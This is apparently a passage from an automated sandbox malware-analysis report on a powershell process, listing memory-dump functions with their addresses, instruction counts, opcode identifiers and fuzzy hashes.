                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x.yk
                                        • API String ID: 0-2575386346
                                        • Opcode ID: 67aa244363fb7d068ce80753b7deb18aae08ebda167bd01740ab8de588606d5c
                                        • Instruction ID: 3dea34574fe0e4d821b452e3baaeef981b4318f51009884a0dbf1a82b4346280
                                        • Opcode Fuzzy Hash: 67aa244363fb7d068ce80753b7deb18aae08ebda167bd01740ab8de588606d5c
                                        • Instruction Fuzzy Hash: A5317030B412049BE754AB64C964BAF76B3AFC5380F20C825E9026F795CE75DC428B91
                                        Function 042F2FF0 Relevance: 1.1, Instructions: 1118COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b6e7e6bae09595ffe66a569151a10f8274da3bdf0be5efb515c4bc4076cc7d
                                        • Instruction ID: 67c1e4774ea516bd604d6fe8e78320ee607c09d07e75213dd9de48cf89611848
                                        • Opcode Fuzzy Hash: 23b6e7e6bae09595ffe66a569151a10f8274da3bdf0be5efb515c4bc4076cc7d
                                        • Instruction Fuzzy Hash: E492FE71A152499FDB01CF68C890ADDFBB1EF49310F6581AAE844EB362C735ED46CB90
                                        Function 06ED52C0 Relevance: .7, Instructions: 706COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02552839eac79ee1b935739ec54fc59c7ab28b809303b7e6f76dda9e665ba232
                                        • Instruction ID: f862eef4448acb698e2b96d1b86f77ee9cc14596358a71e8fff0f6891bfc2ccf
                                        • Opcode Fuzzy Hash: 02552839eac79ee1b935739ec54fc59c7ab28b809303b7e6f76dda9e665ba232
                                        • Instruction Fuzzy Hash: 37524974B003048FD754CB98C944BAEBBB2AF89314F24D469E916AF355DB72EC42CB81
                                        Function 06ED9F28 Relevance: .6, Instructions: 589COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cf46f10a29f41a958debe711b18029097cb3005aa09a0f77f0693b8561be152
                                        • Instruction ID: 62950510671629bfd278d7823b5a0ff0226eababba2723e6f0fa730111f89f69
                                        • Opcode Fuzzy Hash: 7cf46f10a29f41a958debe711b18029097cb3005aa09a0f77f0693b8561be152
                                        • Instruction Fuzzy Hash: 58125931B043048FDB649B6DC9147AAB7A69FC5214F14887BE506CB391EB72CE47C7A1
                                        Function 06ED52A3 Relevance: .5, Instructions: 525COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 768a49d6d6c9e411325e4c638257a2f340aeac0393db15a7563709cc6909cc7f
                                        • Instruction ID: cd2031c4a9be176538e8f4057a9131d03786268da750734c2275d7bd63ca75a4
                                        • Opcode Fuzzy Hash: 768a49d6d6c9e411325e4c638257a2f340aeac0393db15a7563709cc6909cc7f
                                        • Instruction Fuzzy Hash: 8C223A74A00304CFD794CB98C980AAEBBB2AF89315F29D469D915AF355CB72EC42CF41
                                        Function 06ED2D28 Relevance: .4, Instructions: 429COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c36f50cc75c4729cc65f7b18f9f96773a2ef35058e9124cc991f309d594de8f
                                        • Instruction ID: cfb8c5eb62c4abbdc2579579689169c5ac9162e7cd3678161a9a2134b04e4196
                                        • Opcode Fuzzy Hash: 1c36f50cc75c4729cc65f7b18f9f96773a2ef35058e9124cc991f309d594de8f
                                        • Instruction Fuzzy Hash: C2E15931B08345DFD7A58B74C8107AABBB1AF86214B28C4ABDA45DF252D731CD46C7A2
                                        Function 06ED59A1 Relevance: .4, Instructions: 395COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ebbf6b9591a7fc270735774044506a595a499301be8555839d02f8b6b314a123
                                        • Instruction ID: d248c6d249045c8b6a70ba646ecf19c36236fbaa44d9029d0b080d851fb8d69d
                                        • Opcode Fuzzy Hash: ebbf6b9591a7fc270735774044506a595a499301be8555839d02f8b6b314a123
                                        • Instruction Fuzzy Hash: 18F14B74B00304CFD754CB88C980BAABBB2AF85354F14D869E9156F355DBB2EC42CB91
                                        Function 042F9180 Relevance: .3, Instructions: 316COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 028c0a9a5082533b9357a5411fffb906af56f2e546ca2e65707ecd1283fb124f
                                        • Instruction ID: b1dea4aa4a55e57d920a92eb9cf83b9fc59e77621e9e5f8ef4a660873176d597
                                        • Opcode Fuzzy Hash: 028c0a9a5082533b9357a5411fffb906af56f2e546ca2e65707ecd1283fb124f
                                        • Instruction Fuzzy Hash: BBC1BD71B102098FCB18DFA4D984B9DFBB2FF84310F518569E906AB365CB34AD89CB40
                                        Function 06ED8718 Relevance: .3, Instructions: 294COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3066ebd7c0fea1760692dd39821e913e7c606141e88ebb447f45313fab2cb3aa
                                        • Instruction ID: 12d3edb33781eda741263e86705eef263ef24b7fcbc9780432666998b11451ee
                                        • Opcode Fuzzy Hash: 3066ebd7c0fea1760692dd39821e913e7c606141e88ebb447f45313fab2cb3aa
                                        • Instruction Fuzzy Hash: ADA16835B043049FDBA59B7489107AF7BA29FC5244F14C4AAE585CF392DE31CC46C7A2
                                        Function 06ED7E08 Relevance: .3, Instructions: 286COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 530f60cd133728011e4d0ff76f0a72123b5ae5dc9778f24734dd5a332d9fa936
                                        • Instruction ID: 61e4d7ebcd0c93665a3ed48fc307ac60ee896a7f73f78f58132e5bdac6656364
                                        • Opcode Fuzzy Hash: 530f60cd133728011e4d0ff76f0a72123b5ae5dc9778f24734dd5a332d9fa936
                                        • Instruction Fuzzy Hash: BF911631B00305CFDBA4DB68C9107ABB7E6AFC5254F2494AAD916CB351EB31DC4AC791
                                        Function 042F9948 Relevance: .3, Instructions: 253COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07cf6fd121e8251f8e7f50f784db9bd6d95e022bae1112ea4534b2f8f63e0619
                                        • Instruction ID: 5380e450cf06f0f4ddcf73473aae704c1b0cc1321f22bba0c788a3f7aa65d23e
                                        • Opcode Fuzzy Hash: 07cf6fd121e8251f8e7f50f784db9bd6d95e022bae1112ea4534b2f8f63e0619
                                        • Instruction Fuzzy Hash: CB91BD71B003058FDB18EF69D840BAAFBF6AF85314F64847AE419DB651DB70AC45CB90
                                        Function 042F89E8 Relevance: .2, Instructions: 200COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73f2d4f8a3f7e66efb6849a8637b503f68b6b20d09d912be7f8582583bca9870
                                        • Instruction ID: 3ef1d7bfe02b63dab9c523b137be5bfabc1cd7a6a5dad5bb3f0c042477727685
                                        • Opcode Fuzzy Hash: 73f2d4f8a3f7e66efb6849a8637b503f68b6b20d09d912be7f8582583bca9870
                                        • Instruction Fuzzy Hash: 50817B34A21248DFCB15DBA4D884AADFBF2FF89314B5484B9E5059B361CB35E889CB50
                                        Function 042F9AB6 Relevance: .2, Instructions: 188COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2a37135d692da820300b1e98c3527941361131d73e5ed0066f3d08c1e992690
                                        • Instruction ID: b7332df2fc712b052908d792e81131f87a937092817178d4f8ed69b913259cfd
                                        • Opcode Fuzzy Hash: d2a37135d692da820300b1e98c3527941361131d73e5ed0066f3d08c1e992690
                                        • Instruction Fuzzy Hash: 0C714C70A10209DFDB18DFA5D894BADFBF2BF88304F548469D412AB790DB75AD89CB40
                                        Function 042FF968 Relevance: .2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da74d3f2e4d94ad1dd075282d75cae01ceaa07912eca615d861badb69a3b0440
                                        • Instruction ID: e338b00296649dc7c8ca4cfa29b19656c442fdf183e8a8c6be0c7bac53f2f90f
                                        • Opcode Fuzzy Hash: da74d3f2e4d94ad1dd075282d75cae01ceaa07912eca615d861badb69a3b0440
                                        • Instruction Fuzzy Hash: AE717D71E20209DFDB10CFA9C981B9EFBF2AF88714F55803AD515A7254EB74A841CF91
                                        Function 06ED8712 Relevance: .1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 216d58ff52334c413106f3923914dc4f6d6a5f798127a6b8049b295a0342e463
                                        • Instruction ID: 27bb9c3a50aa708e6ed31cce409a1ddedf4e891e0ade4b7c49d943cafec25f02
                                        • Opcode Fuzzy Hash: 216d58ff52334c413106f3923914dc4f6d6a5f798127a6b8049b295a0342e463
                                        • Instruction Fuzzy Hash: B4412735F003019FDBE48B68C650BAF77F69F84348B549466D505DB3A1E731D842C7A2
                                        Function 042F8D2F Relevance: .1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8de8838260a772337b8f8c99292849c1ba45f7184b667891f83c132f2037ff0c
                                        • Instruction ID: 31bc1e02e5b6adfa87dd4b1d6eab9d6dc99f99ccae4f0d22a1989ca83db325f1
                                        • Opcode Fuzzy Hash: 8de8838260a772337b8f8c99292849c1ba45f7184b667891f83c132f2037ff0c
                                        • Instruction Fuzzy Hash: 8F41EDB07203148FDB14DFA4CD99B6DBBB6BF89700B9040A5E502CB366DB34AC88CB51
                                        Function 06ED9F0D Relevance: .1, Instructions: 127COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31a1c5120116579d5c50b1d7e20b523901afe7fe547afa33aac2b9b49af20cd1
                                        • Instruction ID: 34ced55c97c8170ab73b8d1817a12ad2e33455541120c664a24bca6132486e1f
                                        • Opcode Fuzzy Hash: 31a1c5120116579d5c50b1d7e20b523901afe7fe547afa33aac2b9b49af20cd1
                                        • Instruction Fuzzy Hash: 2B412D31E003019FDBA09F6CC94077A77B69FC4294B249476E9009B792E736DD87C7A1
                                        Function 042F96EF Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 413b95a315f3dc478e622beffcce5508e9c7f7ddd593b5587733767297595565
                                        • Instruction ID: e136535b81a9eb2c49354ecad56ab910011dddeffabe5acef59e191f1e6132d8
                                        • Opcode Fuzzy Hash: 413b95a315f3dc478e622beffcce5508e9c7f7ddd593b5587733767297595565
                                        • Instruction Fuzzy Hash: E4417A71B102058FDB58EF64C858BADBBB6AF88750F444028E506EB7A0CF30AC80DB90
                                        Function 042F9947 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eff992b96a42ad267e69f00d838577717d126c54434b0afd6791435ff1ca6d3
                                        • Instruction ID: e31e25829830cf4f3f32d6874e078330342071358778b4ebbae3fce5b51ff720
                                        • Opcode Fuzzy Hash: 5eff992b96a42ad267e69f00d838577717d126c54434b0afd6791435ff1ca6d3
                                        • Instruction Fuzzy Hash: 82412970A103199FDB18DFA5C89879DFBF6BF88344F548439D406AB790DB74A889CB80
                                        Function 06ED0EE0 Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e4c65e91ac0a494315476159fa436509e2c04c53554dafacea714ff69167648
                                        • Instruction ID: dd1cf3d75f94e2b803db7900fb0dccf4f7580a34a60de8a5f0d536f15ae65406
                                        • Opcode Fuzzy Hash: 0e4c65e91ac0a494315476159fa436509e2c04c53554dafacea714ff69167648
                                        • Instruction Fuzzy Hash: BB218B327003059BEBA05EAA8810B7BB69A9FC4705F38C83AA506CB3C1DD75C942C3A5
                                        Function 06ED0EC3 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70f63fa453c17706aee6b7529db2d8aba221033fc6382c293673f442ef227b3f
                                        • Instruction ID: 01d17b81c921e648963a48e37c452e46a700ce388186aa2acd4870832e4dd3c2
                                        • Opcode Fuzzy Hash: 70f63fa453c17706aee6b7529db2d8aba221033fc6382c293673f442ef227b3f
                                        • Instruction Fuzzy Hash: 6B219B32705340AFE7A00EB949607B66BA65FC1300F3C8466E545CB3C6D978CD42D375
                                        Function 042F8CFF Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35937ace0d5177fa43c88c8fc9b97460d6b40e40f8081be72f98ded9a6fa719e
                                        • Instruction ID: 21726ca35539a2e51bbcea7cfa14980e557fb0dad6db5bf328d4870eebdd932e
                                        • Opcode Fuzzy Hash: 35937ace0d5177fa43c88c8fc9b97460d6b40e40f8081be72f98ded9a6fa719e
                                        • Instruction Fuzzy Hash: 0C21F3B17283868FEB15DF64CD99B6DBF71AF81704F8540A5D501CB262D738AC88CB91
                                        Function 042F2BDC Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd1b7d797f155da4293539fd5daab41821a192a9acb0bcc764a7dfd63f5093d2
                                        • Instruction ID: 1688d61693ed1373c59cffa18e18d2ff6caf4d4d607227bf4fb790bd99577074
                                        • Opcode Fuzzy Hash: fd1b7d797f155da4293539fd5daab41821a192a9acb0bcc764a7dfd63f5093d2
                                        • Instruction Fuzzy Hash: 8E21A776A2D3D19FD7029B7C9CA07D9BF61CF43114F4A81E3C094CB193E41AA94AC7A6
                                        Function 042FC3BC Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01f052c0f68ce8a836997649f6fda886710cf3096103d4ce5154babcd9fbfc71
                                        • Instruction ID: 9eb7c57cf2b9ece8d779b62eecafcd37acb92483827685b18e96297b9e5de2b8
                                        • Opcode Fuzzy Hash: 01f052c0f68ce8a836997649f6fda886710cf3096103d4ce5154babcd9fbfc71
                                        • Instruction Fuzzy Hash: 9B312D30B1022C8BCB269B34C8556EEB7B6BF89345F0040E9D50AAB391DF359E85CF81
                                        Function 042F39A0 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ee5c7088c6cb14fea48e57656ecec18c5e6b326589586510984217124e9e79d
                                        • Instruction ID: 3cef314cc3c5712993ef7c07b67c651ce542232d7ae346bfcfbd9cacf2dfc270
                                        • Opcode Fuzzy Hash: 0ee5c7088c6cb14fea48e57656ecec18c5e6b326589586510984217124e9e79d
                                        • Instruction Fuzzy Hash: 2E212A75A00609DFCB04CF89D880AAAF7B5FF48310B158569E919EB751C731FC51CBA1
                                        Function 042F39B0 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 891e203d017132e65a0a62f50ff11340f827df0baeb811a3b3143c1da37ae065
                                        • Instruction ID: 9b533f8c58ad961e4ad886d26a5de27c07bb942ed52bc28fbe653d37a7ca46d0
                                        • Opcode Fuzzy Hash: 891e203d017132e65a0a62f50ff11340f827df0baeb811a3b3143c1da37ae065
                                        • Instruction Fuzzy Hash: F121E475A0060ADFCB44CF89C880AAAF7B5FF88310B258569E909EB751C731FC51CBA0
                                        Function 06ED3262 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 067506acda63b928f4029c8a208cdc1d85e79f65fc9517f58624340a016cf8aa
                                        • Instruction ID: 9699d49d81f278076bfaadd3db2fe3d833072335eaea38980587fe157af76cfa
                                        • Opcode Fuzzy Hash: 067506acda63b928f4029c8a208cdc1d85e79f65fc9517f58624340a016cf8aa
                                        • Instruction Fuzzy Hash: 7B110A34609384AFD7658B64C851F52BB31AF83318F14C49BE9458F292C7729C43CBD2
                                        Function 06ED0CD0 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc7555d1d9856180bd46ac14e7a36e6e0dc12a93635ec72106729bc2c61ae492
                                        • Instruction ID: 2974d8dad1c653f3728a86add8d34b9141126206c4ee70388eb0addc79d5347b
                                        • Opcode Fuzzy Hash: cc7555d1d9856180bd46ac14e7a36e6e0dc12a93635ec72106729bc2c61ae492
                                        • Instruction Fuzzy Hash: 0401F7367003199BD7605DAAE4007BBBB9ADFC5226F18C43BD949CB241DA32D846CBA0
                                        Function 0095D01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1807411543.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_95d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06497c90b4cdfb9e088f2d2d82fda61f4cf9e548d1f8bc83f6d988b5bb3279b4
                                        • Instruction ID: b5b5a5786ab7734d86690a3a031c4cbbf3650ac7c70351b60b615874897808f4
                                        • Opcode Fuzzy Hash: 06497c90b4cdfb9e088f2d2d82fda61f4cf9e548d1f8bc83f6d988b5bb3279b4
                                        • Instruction Fuzzy Hash: B601A2315063409BE720CA36DD84B66BB9CDF41366F18C45AED484A2C2C6799949CBB2
                                        Function 042F2B63 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b2425d3092ed7d09b8b8ca843d1279f4c5f4aca4fd0a28609d28f65005795bd
                                        • Instruction ID: 6a94613372216712e4461286b07530f47d1dd3d1244bbb093fdc1f6d464afd69
                                        • Opcode Fuzzy Hash: 7b2425d3092ed7d09b8b8ca843d1279f4c5f4aca4fd0a28609d28f65005795bd
                                        • Instruction Fuzzy Hash: 22014478B102199FD700DB98D4917EDF771FF8E310B2481A9D95AA7361CA36EC038B50
                                        Function 0095D005 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1807411543.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_95d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc1cd800e941bc3ee09bead68fa2a298d06b00bf7d3b08cf9732634dcb2898a2
                                        • Instruction ID: bf964cd2293c296a122eb04f65f36c188fe7430fe47a16f56757c6f434d32f19
                                        • Opcode Fuzzy Hash: fc1cd800e941bc3ee09bead68fa2a298d06b00bf7d3b08cf9732634dcb2898a2
                                        • Instruction Fuzzy Hash: C8014C6200E3C05FE7128B218D94B52BFA8AF53225F18C1DBDC888F2D3C2699849C772
                                        Function 042F4ADD Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1f957d9ff91c2e4db95e1ded0116c059871f7908c5d381fe05ee5d1c69b24f3
                                        • Instruction ID: 9c315326031d92bc323d1d4d5ca11cb4024066cd3314b440795869f354d4ba09
                                        • Opcode Fuzzy Hash: d1f957d9ff91c2e4db95e1ded0116c059871f7908c5d381fe05ee5d1c69b24f3
                                        • Instruction Fuzzy Hash: 82F0BE74A10105DFCB00DF98C8407AAF775FF88211B2084A9CA4AA3651CB36EC63CB91
                                        Function 06ED30AC Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ddf17ca723492f262565140e96639b49e94099ce9027f6dff3ae62eb407526ac
                                        • Instruction ID: 2b79d3e4dc19781b3c876d6e0ab30c9c4be95383c974b7a2db3e20fa3a2a62a0
                                        • Opcode Fuzzy Hash: ddf17ca723492f262565140e96639b49e94099ce9027f6dff3ae62eb407526ac
                                        • Instruction Fuzzy Hash: 1FF0153460D3809FD3928B14D854A20FB71AB83258B18E0DBC0848F2A3D7678843CB52

                                        Non-executed Functions

                                        Function 0095D6F8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1807411543.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                        Joe Sandbox IDA Plugin
